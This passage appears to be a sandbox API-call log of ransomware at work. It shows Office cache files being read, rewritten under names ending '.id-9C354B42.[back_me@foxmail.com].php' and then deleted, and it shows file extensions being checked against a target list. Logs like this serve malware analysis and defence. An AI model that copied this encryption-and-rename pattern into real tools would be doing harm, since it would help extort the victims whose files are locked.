lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.284] GetLastError () returned 0x0 [0035.284] ReadFile (in: hFile=0x1a8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x5b1, lpOverlapped=0x0) returned 1 [0035.286] WriteFile (in: hFile=0x1a4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x5c0, lpOverlapped=0x0) returned 1 [0035.287] ReadFile (in: hFile=0x1a8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.287] WriteFile (in: hFile=0x1a4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.287] SetEndOfFile (hFile=0x1a4) returned 1 [0035.287] CloseHandle (hObject=0x1a4) returned 1 [0035.287] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.287] SetEndOfFile (hFile=0x1a8) returned 1 [0035.288] CloseHandle (hObject=0x1a8) returned 1 [0035.288] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.291] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml")) returned 1 [0035.291] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.291] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.291] lstrlenW (lpString=".doc") returned 4 [0035.291] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.291] lstrlenW (lpString=".docx") returned 5 [0035.291] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0035.291] lstrlenW (lpString=".pdf") returned 4 [0035.291] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.291] lstrlenW (lpString=".xls") returned 4 [0035.291] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.291] lstrlenW (lpString=".xlsx") returned 5 [0035.292] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0035.292] lstrlenW (lpString=".ppt") returned 4 [0035.292] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.292] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.292] lstrlenW (lpString=".zip") returned 4 [0035.292] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.292] lstrlenW (lpString=".rar") returned 4 [0035.292] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.292] lstrlenW (lpString=".bz2") returned 4 [0035.292] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.292] lstrlenW (lpString=".7z") returned 3 [0035.292] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.292] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.292] lstrlenW (lpString=".dbf") returned 4 [0035.292] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.292] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.292] lstrlenW (lpString=".1cd") returned 4 [0035.292] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.292] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.292] lstrlenW (lpString=".jpg") returned 4 [0035.292] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.292] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.292] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.292] lstrlenW (lpString=".doc") returned 4 [0035.292] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.292] lstrlenW (lpString=".docx") returned 5 [0035.292] lstrcmpiW (lpString1=".docx", lpString2="f.xml") returned -1 [0035.292] lstrlenW (lpString=".pdf") returned 4 [0035.292] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.292] lstrlenW (lpString=".xls") returned 4 [0035.292] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.292] lstrlenW (lpString=".xlsx") returned 5 [0035.292] lstrcmpiW (lpString1=".xlsx", lpString2="f.xml") returned -1 [0035.293] lstrlenW (lpString=".ppt") returned 4 [0035.293] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.293] lstrlenW (lpString=".zip") returned 4 [0035.293] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.293] lstrlenW (lpString=".rar") returned 4 [0035.293] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.293] lstrlenW (lpString=".bz2") returned 4 [0035.293] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.293] lstrlenW (lpString=".7z") returned 3 [0035.293] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.293] lstrlenW (lpString=".dbf") returned 4 [0035.293] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.293] lstrlenW (lpString=".1cd") returned 4 [0035.293] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.293] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 81 [0035.293] lstrlenW (lpString=".jpg") returned 4 [0035.293] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.293] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.293] lstrlenW (lpString="ProjectMUI.xml") returned 14 [0035.293] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.295] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1452) returned 1 [0035.295] CloseHandle (hObject=0x1a8) returned 1 [0035.295] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 0x2020 [0035.295] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.295] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.295] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.295] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.295] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.295] GetLastError () returned 0x0 [0035.295] ReadFile (in: hFile=0x1a8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x5ac, lpOverlapped=0x0) returned 1 [0035.297] WriteFile (in: hFile=0x1a4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0035.298] ReadFile (in: hFile=0x1a8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.298] WriteFile (in: hFile=0x1a4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0035.298] SetEndOfFile (hFile=0x1a4) returned 1 [0035.298] CloseHandle (hObject=0x1a4) returned 1 [0035.299] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.299] SetEndOfFile (hFile=0x1a8) returned 1 [0035.300] CloseHandle (hObject=0x1a8) returned 1 [0035.300] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.300] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml")) returned 1 [0035.300] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.300] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.300] lstrlenW (lpString=".doc") returned 4 [0035.300] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.300] lstrlenW (lpString=".docx") returned 5 [0035.300] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.300] lstrlenW (lpString=".pdf") returned 4 [0035.300] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.300] lstrlenW (lpString=".xls") returned 4 [0035.300] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.300] lstrlenW (lpString=".xlsx") returned 5 [0035.300] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.300] lstrlenW (lpString=".ppt") returned 4 [0035.301] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.301] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.301] lstrlenW (lpString=".zip") returned 4 [0035.301] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.301] lstrlenW (lpString=".rar") returned 4 [0035.301] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.301] lstrlenW (lpString=".bz2") returned 4 [0035.301] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.301] lstrlenW (lpString=".7z") returned 3 [0035.301] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.301] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.301] lstrlenW (lpString=".dbf") returned 4 [0035.301] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.301] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.301] lstrlenW (lpString=".1cd") returned 4 [0035.301] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.301] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.301] lstrlenW (lpString=".jpg") returned 4 [0035.301] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.301] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.301] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.301] lstrlenW (lpString=".doc") returned 4 [0035.301] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.301] lstrlenW (lpString=".docx") returned 5 [0035.301] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.301] lstrlenW (lpString=".pdf") returned 4 [0035.301] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.301] lstrlenW (lpString=".xls") returned 4 [0035.301] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.301] lstrlenW (lpString=".xlsx") returned 5 [0035.301] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.301] lstrlenW (lpString=".ppt") returned 4 [0035.301] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.302] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.302] lstrlenW (lpString=".zip") returned 4 [0035.302] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.302] lstrlenW (lpString=".rar") returned 4 [0035.302] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.302] lstrlenW (lpString=".bz2") returned 4 [0035.302] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.302] lstrlenW (lpString=".7z") returned 3 [0035.302] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.302] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.302] lstrlenW (lpString=".dbf") returned 4 [0035.302] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.302] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.302] lstrlenW (lpString=".1cd") returned 4 [0035.302] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.302] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 77 [0035.302] lstrlenW (lpString=".jpg") returned 4 [0035.302] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.302] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.302] lstrlenW (lpString="Setup.xml") returned 9 [0035.302] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.303] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1872) returned 1 [0035.303] CloseHandle (hObject=0x1a8) returned 1 [0035.303] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.303] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.303] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.303] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.303] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.303] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.303] GetLastError () returned 0x0 [0035.303] ReadFile (in: hFile=0x1a8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x750, lpOverlapped=0x0) returned 1 [0035.305] WriteFile (in: hFile=0x1a4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x760, lpOverlapped=0x0) returned 1 [0035.306] ReadFile (in: hFile=0x1a8, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.306] WriteFile (in: hFile=0x1a4, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.306] SetEndOfFile (hFile=0x1a4) returned 1 [0035.306] CloseHandle (hObject=0x1a4) returned 1 [0035.307] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.307] SetEndOfFile (hFile=0x1a8) returned 1 [0035.307] CloseHandle (hObject=0x1a8) returned 1 [0035.307] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0035.308] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.308] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.308] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.308] lstrlenW (lpString=".doc") returned 4 [0035.308] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.308] lstrlenW (lpString=".docx") returned 5 [0035.308] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.308] lstrlenW (lpString=".pdf") returned 4 [0035.308] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.308] lstrlenW (lpString=".xls") returned 4 [0035.308] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.308] lstrlenW (lpString=".xlsx") returned 5 [0035.308] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.308] lstrlenW (lpString=".ppt") returned 4 [0035.308] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.308] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.308] lstrlenW (lpString=".zip") returned 4 [0035.308] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.308] lstrlenW (lpString=".rar") returned 4 [0035.308] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.308] lstrlenW (lpString=".bz2") returned 4 [0035.309] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.309] lstrlenW (lpString=".7z") returned 3 [0035.309] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.309] lstrlenW (lpString=".dbf") returned 4 [0035.309] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.309] lstrlenW (lpString=".1cd") returned 4 [0035.309] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.309] lstrlenW (lpString=".jpg") returned 4 [0035.309] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.309] lstrlenW (lpString=".doc") returned 4 [0035.309] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.309] lstrlenW (lpString=".docx") returned 5 [0035.309] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.309] lstrlenW (lpString=".pdf") returned 4 [0035.309] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.309] lstrlenW (lpString=".xls") returned 4 [0035.309] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.309] lstrlenW (lpString=".xlsx") returned 5 [0035.309] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.309] lstrlenW (lpString=".ppt") returned 4 [0035.309] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.309] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.309] lstrlenW (lpString=".zip") returned 4 [0035.309] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.309] lstrlenW (lpString=".rar") returned 4 [0035.309] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.310] lstrlenW (lpString=".bz2") returned 4 [0035.310] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.310] lstrlenW (lpString=".7z") returned 3 [0035.310] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.310] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.310] lstrlenW (lpString=".dbf") returned 4 [0035.310] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.310] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.310] lstrlenW (lpString=".1cd") returned 4 [0035.310] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.310] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.310] lstrlenW (lpString=".jpg") returned 4 [0035.310] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.310] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0035.310] lstrlenW (lpString="GrooveMUI.xml") returned 13 [0035.310] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.311] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=913) returned 1 [0035.312] CloseHandle (hObject=0x1a8) returned 1 [0035.312] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml")) returned 0x2020 [0035.312] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.312] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0035.312] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.312] SetFilePointerEx (in: 